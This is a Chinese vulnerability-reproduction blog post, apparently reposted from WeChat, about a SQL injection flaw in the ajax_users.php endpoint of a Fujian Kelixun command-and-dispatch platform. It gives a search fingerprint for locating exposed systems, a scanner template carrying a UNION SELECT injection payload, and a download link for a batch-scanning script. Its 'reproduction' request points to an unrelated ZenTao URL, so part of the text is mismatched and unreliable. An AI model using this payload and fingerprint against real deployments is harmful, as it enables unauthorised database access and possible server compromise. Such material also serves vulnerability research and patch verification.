一:漏洞名称
福建科立讯通信 指挥调度管理平台ajax_users.php SQL注入漏洞
二:漏洞描述
该产品 ajax_users.php接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
三:漏洞影响版本
指挥调度管理平台
四:网络空间测绘查询
body="指挥调度管理平台"
五:漏洞复现
GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy HTTP/1.1
Host: 127.0.0.1
Content-Length: 0
SQL注入是一种常见的网络应用程序漏洞,攻击者通过利用该漏洞可以执行未经授权的数据库操作。SQL注入漏洞的原理是在应用程序中未对用户输入进行充分验证和过滤,导致恶意用户能够将恶意的SQL代码注入到应用程序的数据库查询语句中,从而实现执行额外的SQL语句。
查询md5值
建议更新当前系统或软件至最新版,完成漏洞的修复。
获取批量验证脚本
id: Fujian-Collexion-communication-command-and-dispatch-management-platform-ajax-users-php-SQL-injection-vulnerability info: name: 福建科立讯通信 指挥调度管理平台 ajax_users.php SQL注入漏洞 author: Adler severity: critical description: | - 福建科立讯通信的指挥调度管理平台是一种用于管理和协调各种通信设备和资源的系统。该平台旨在帮助企业有效地监控、调度和管理通信设备、人员和任务,以提高工作效率和服务质量。 该产品 ajax_users.php接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 http: - raw: - | POST /app/ext/ajax_users.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info Content-Type: application/x-www-form-urlencoded dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- - matchers-condition: and matchers: - type: word part: body words: - "usr_number" - type: status status: - 200
链接:https://pan.baidu.com/s/1voWRnYlUqPXcwmPOsI-XwQ 提取码:u7v3
原文始发于微信公众号(Adler学安全):漏洞复现-福建科立讯通信 指挥调度管理平台ajax_users.php 存在SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论